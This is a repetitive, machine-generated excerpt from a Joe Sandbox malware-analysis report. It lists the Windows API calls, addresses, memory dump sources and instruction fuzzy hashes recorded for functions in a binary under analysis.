                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                • Opcode ID: 83f1d204c93dcf4e4fc8bbb59bc351b561ec035aacc26d822ed35569f97f36f1
                                                                                                                                                                                                                                                                • Instruction ID: da1f02c41126808fc14f8207b385c3d361aa3f84185dc72472ee53023e2dc872
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83f1d204c93dcf4e4fc8bbb59bc351b561ec035aacc26d822ed35569f97f36f1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0641C175A00104EFE725DF28CC68FAA7BE5EB09350F154368E895A72E0C779BD61CA60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                                                • Opcode ID: a1ffe7c38bb6425ffda0414afd659e29e4e2957b0247edbe0b0068d68e986d2e
                                                                                                                                                                                                                                                                • Instruction ID: 93ed80413e6bf5e2696b2b737e515508600cbfd007d6ba2992475b540e7414eb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1ffe7c38bb6425ffda0414afd659e29e4e2957b0247edbe0b0068d68e986d2e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF41E472A40201AFCB24EF7CC890A9EB7E6EF8A714F1545A9E615EB351D631AD01CB80
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,006EC21E,00000000), ref: 006ECF38
                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 006ECF6F
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?,?,006EC21E,00000000), ref: 006ECFB4
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,006EC21E,00000000), ref: 006ECFC8
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,006EC21E,00000000), ref: 006ECFF2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                • Opcode ID: 4eef9e4a7a497b426b5fd1f6b70090175d16b0e1024dc8dfae3957a6fd23e634
                                                                                                                                                                                                                                                                • Instruction ID: 3265a58bf4a8f9609260a05815eb3d3157bb94ca0c633e9a4f753b4f5ed9beec
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4eef9e4a7a497b426b5fd1f6b70090175d16b0e1024dc8dfae3957a6fd23e634
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1314F71501345EFDB20DFA6C884AABBBFAEF14361B10852EF506D2240DB34AE42DB64
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 006F0951
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 006F0968
                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 006F09A4
                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 006F09B0
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 006F09E8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                • Opcode ID: 69a92afe0da436c5b5c8b79fa41ab090ddddb67b4f3d9d70750e6936ea5aefc0
                                                                                                                                                                                                                                                                • Instruction ID: 32011708739cb50d28127319b5a4cb2855cd2c5f60e8270cd8f6309b23303868
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69a92afe0da436c5b5c8b79fa41ab090ddddb67b4f3d9d70750e6936ea5aefc0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62218135600204EFE754EF65C885AAEBBE6EF49700F04C16CF94A9B362DB74AC04CB94
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 006ACDC6
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006ACDE9
                                                                                                                                                                                                                                                                  • Part of subcall function 006A3820: RtlAllocateHeap.NTDLL(00000000,?,00741444,?,0068FDF5,?,?,0067A976,00000010,00741440,006713FC,?,006713C6,?,00671129), ref: 006A3852
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 006ACE0F
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006ACE22
                                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006ACE31
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 336800556-0
                                                                                                                                                                                                                                                                • Opcode ID: 0d4b69a073d2e0e7487231c1b6eb0912e17bc8a1526af968b05fb8239de96cb8
                                                                                                                                                                                                                                                                • Instruction ID: bfb05163912ced6b25cc3abd0863e6571d63691a5c7c40fada9268bcfa4307c7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d4b69a073d2e0e7487231c1b6eb0912e17bc8a1526af968b05fb8239de96cb8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B01D8726012157FA72137BA6C48C7BA96EEEC7BB1315426DF905D7301EE648D0289F4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,0069F2DE,006A3863,00741444,?,0068FDF5,?,?,0067A976,00000010,00741440,006713FC,?,006713C6), ref: 006A2DFD
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A2E32
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A2E59
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00671129), ref: 006A2E66
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00671129), ref: 006A2E6F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                • Opcode ID: 8293d34577a26bcf7ff785252f0fbad231bd5ed5f54b740b71ea67961f594801
                                                                                                                                                                                                                                                                • Instruction ID: d36a7fed01397c3c2358aeb3016c633e995b14ada113311d059d0aa065371f94
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8293d34577a26bcf7ff785252f0fbad231bd5ed5f54b740b71ea67961f594801
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 470149322C46026BC613733D2C96D6B265BBBC3771720422CF421E2392EF38CC410D25
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,006CFF41,80070057,?,?,?,006D035E), ref: 006D002B
                                                                                                                                                                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006CFF41,80070057,?,?), ref: 006D0046
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006CFF41,80070057,?,?), ref: 006D0054
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006CFF41,80070057,?), ref: 006D0064
                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006CFF41,80070057,?,?), ref: 006D0070
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                • Opcode ID: 0b6bda09415d5670352e7a485a80b97ea55f611c4217ab6bc4a6ecc5fe506de6
                                                                                                                                                                                                                                                                • Instruction ID: 4e96c80fc3a6c5e96ac05ee8196baa4cdf3badbb929bea343b415846fe9fec11
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b6bda09415d5670352e7a485a80b97ea55f611c4217ab6bc4a6ecc5fe506de6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6901A272A00204FFEB114F68DC04BAA7AEEEF84752F148225F905D6350DBB5DD408BA4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 006DE997
                                                                                                                                                                                                                                                                • QueryPerformanceFrequency.KERNEL32(?), ref: 006DE9A5
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 006DE9AD
                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 006DE9B7
                                                                                                                                                                                                                                                                • Sleep.KERNEL32 ref: 006DE9F3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                • Opcode ID: 24574819aaa9ff204d7e2324cd3e416761820ef1ca20573d58acadcecf453de3
                                                                                                                                                                                                                                                                • Instruction ID: 576d54e9673b2ff76fb0b8d1e1b931f390cdcc18a5d9ac8edf40f7a53cde23a8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24574819aaa9ff204d7e2324cd3e416761820ef1ca20573d58acadcecf453de3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31016971C0262DDBCF00AFE4DC69AEDBB79FF08300F004656E502BA240CB399551CBA5
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006D0FCA
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006D0FD6
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006D0FE5
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006D0FEC
                                                                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006D1002
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 44706859-0
                                                                                                                                                                                                                                                                • Opcode ID: df0156e98fd5d1acd170b656df16914eb8c76faedd775361c81afdea70675c02
                                                                                                                                                                                                                                                                • Instruction ID: b4c4900f2e05f53a8cfedb713f31a5e681e6dba65859393bf1f0bcd353e0696b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df0156e98fd5d1acd170b656df16914eb8c76faedd775361c81afdea70675c02
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83F04F75600305FBD7225FA59C49F963B6EEF8A761F108615F945CA351CE74DC408A60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,006E017D,?,006E32FC,?,00000001,006B2592,?), ref: 006E0324
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,006E017D,?,006E32FC,?,00000001,006B2592,?), ref: 006E0331
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,006E017D,?,006E32FC,?,00000001,006B2592,?), ref: 006E033E
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,006E017D,?,006E32FC,?,00000001,006B2592,?), ref: 006E034B
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,006E017D,?,006E32FC,?,00000001,006B2592,?), ref: 006E0358
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,006E017D,?,006E32FC,?,00000001,006B2592,?), ref: 006E0365
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                • Opcode ID: 6c758d888037d8d62c7e11ae46fe9c98a988773696d582e0c52b103fb5343bca
                                                                                                                                                                                                                                                                • Instruction ID: 1f826990833473cb5200e738e868ac3a560131eb1ca2ba254feffe262f751a37
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c758d888037d8d62c7e11ae46fe9c98a988773696d582e0c52b103fb5343bca
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C201E272801B42DFD7309F66D880442F7F6BF503053158A3FD19252A30C3B1A984CF80
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A22BE
                                                                                                                                                                                                                                                                  • Part of subcall function 006A29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006AD7D1,00000000,00000000,00000000,00000000,?,006AD7F8,00000000,00000007,00000000,?,006ADBF5,00000000), ref: 006A29DE
                                                                                                                                                                                                                                                                  • Part of subcall function 006A29C8: GetLastError.KERNEL32(00000000,?,006AD7D1,00000000,00000000,00000000,00000000,?,006AD7F8,00000000,00000007,00000000,?,006ADBF5,00000000,00000000), ref: 006A29F0
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A22D0
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A22E3
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A22F4
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 006A2305
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                • Opcode ID: 965316b21283f1acdf0ddb5de9ce23b8aef36569cba1cbbaf40ee475e6dfef75
                                                                                                                                                                                                                                                                • Instruction ID: 3bc8ab9b5c6089a8eda4d2dde1eaa5205dc12e00835b55c6789424a9052c4578
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 965316b21283f1acdf0ddb5de9ce23b8aef36569cba1cbbaf40ee475e6dfef75
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08F030785802118F8793BF69BC118493B66B71BF51740851BF510D2271C73C2D51AFED
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.0000000000732000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695084785.000000000073C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2695157017.0000000000744000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_670000_2ada66c192.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __freea$_free
                                                                                                                                                                                                                                                                • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                • Opcode ID: 1b52a83e9b4fdd0bbc174c13733de805687d19653f7e45a70d7ed2574e3a9af2
                                                                                                                                                                                                                                                                • Instruction ID: 3ec76fce13a6bb5fa215643f342dc915cb2e49df7eeeb530cfadabe563ad1e71
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b52a83e9b4fdd0bbc174c13733de805687d19653f7e45a70d7ed2574e3a9af2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CD1EE31900206DADF28AF68C855BFAB7B7EF07310F28415AE901AF751D6359E81CFA5
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00690242: EnterCriticalSection.KERNEL32(0074070C,00741884,?,?,0068198B,00742518,?,?,?,006712F9,00000000), ref: 0069024D
                                                                                                                                                                                                                                                                  • Part of subcall function 00690242: LeaveCriticalSection.KERNEL32(0074070C,?,0068198B,00742518,?,?,?,006712F9,00000000), ref: 0069028A
                                                                                                                                                                                                                                                                  • Part of subcall function 006900A3: __onexit.LIBCMT ref: 006900A9
                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 006F6238
                                                                                                                                                                                                                                                                  • Part of subcall function 006901F8: EnterCriticalSection.KERNEL32(0074070C,?,?,00688747,00742514), ref: 00690202
                                                                                                                                                                                                                                                                  • Part of subcall function 006901F8: LeaveCriticalSection.KERNEL32(0074070C,?,00688747,00742514), ref: 00690235
                                                                                                                                                                                                                                                                  • Part of subcall function 006E359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 006E35E4
                                                                                                                                                                                                                                                                  • Part of subcall function 006E359C: LoadStringW.USER32(00742390,?,00000FFF,?), ref: 006E360A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2694679873.0000000000671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694624521.0000000000670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2694886088.000000000070C000.00000002.00000001.01000000.0000000B.sdmpDownload File
